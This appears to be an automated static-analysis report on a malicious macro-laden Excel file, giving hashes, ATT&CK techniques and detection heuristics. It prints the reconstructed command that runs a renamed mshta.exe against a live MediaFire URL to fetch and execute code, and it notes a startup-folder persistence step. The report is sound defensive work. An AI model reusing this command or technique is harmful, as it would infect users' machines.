Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 eb2d4627e73e173b…

MALICIOUS

Office (OOXML) / .XLSX

25.6 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-06-06
MD5: e0e8ee09d117217c1dc4dab0b4af335c SHA-1: c6514785cacd888bb1fec642ff45ce59fbb6bbd5 SHA-256: eb2d4627e73e173b9e5b42d2766036d8985e0ceb422ce09bb707239247b92d43
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1218.004 Client Execution: Mshta T1059.005 Visual Basic T1566.001 Phishing: Spearphishing Attachment

The sample contains a Workbook_Open macro that executes a command. The script reconstructs the command to be 'wscript C:\ProgramData\mong.com', where 'mong.com' is a copy of mshta.exe. This command is then executed with the argument 'C:\ProgramData\mong.com https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file', which will launch mshta.exe to download and execute content from the provided URL. Additionally, the script attempts to copy 'zaim.js' to the user's startup folder for persistence. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document likely instructs the user to manually paste commands, further supporting the malicious intent.

Heuristics 6

  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.mediafire.com/file/s8z2kf4phq9wqbz/11.htm/file

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
d186117592d34b5fb842bed9f6ee9bc4530e9e2115df4abb53f0810057b81c01		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10331 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
vbaProject_00.bin
04a0a0a466cacf276e31f0a6e14c94d1e475b0fae2b22cce87c4af3e6b66918c		 vba-project OOXML VBA project: xl/vbaProject.bin 43008 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.